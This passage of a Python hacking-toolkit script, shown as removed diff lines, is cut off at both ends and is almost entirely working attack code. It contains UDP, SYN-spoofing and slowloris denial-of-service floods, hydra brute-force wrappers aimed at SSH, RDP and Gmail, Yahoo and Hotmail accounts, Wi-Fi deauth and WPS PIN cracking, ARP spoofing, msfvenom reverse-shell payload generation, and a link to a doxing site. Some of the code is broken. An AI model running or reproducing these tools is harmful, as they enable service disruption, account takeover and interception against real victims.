br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 